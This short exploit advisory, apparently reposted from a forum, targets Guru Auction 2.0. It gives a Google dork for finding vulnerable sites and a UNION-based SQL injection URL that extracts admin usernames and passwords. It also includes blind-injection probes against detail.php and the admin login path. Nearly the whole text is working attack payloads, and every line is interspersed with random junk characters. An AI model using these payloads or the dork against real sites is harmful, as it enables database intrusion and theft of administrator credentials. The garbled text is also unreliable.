Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
, I# G# m: F$ y$ S6 p, r
9 D! w* S9 |; t3 T8 `7 ~2 I作者 : v3n0m3 ^! U5 u9 R3 u
应用 : Guru Auction 2.0% l" p/ l0 A: A
Price : $493 q5 X# |* Z6 W2 l% {
Vendor : http://www.guruscript.com/+ }0 ?5 z. ?) ]7 x
Google Dork : inurl:subcat.php?cate_id=
& S4 Q& |* w; V/ r
/ \1 N9 H0 s% D0 W5 JSQLi p0c:0 S; L$ e. q' P+ T7 c
~~~~~~~~~~" i( k) W5 r- N# a# C
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--2 y0 L. p8 D+ E) P5 @& O8 G
. T) w: c/ B3 e. }: F
2 O; z% e: Z) J/ G+ ^8 c6 m
盲注 p0c:' e# a0 J7 Z: D c, g2 h6 g
~~~~~~~~~~& c0 h2 V# `2 Z/ C6 v3 [- I
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true0 l& p5 g! n& x' T) @
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false4 J. }1 U( p$ X) G% `3 ?% `& y3 r
& R7 n3 A/ q N5 C) T i/ D管理登录入口:
4 {- `5 h: Y0 e# `~~~~~~~~~~0 X5 P% Q1 y) t) _9 Y z
http://domain.tld/[path]/admin/
7 f4 p- r4 ?# o, l% L |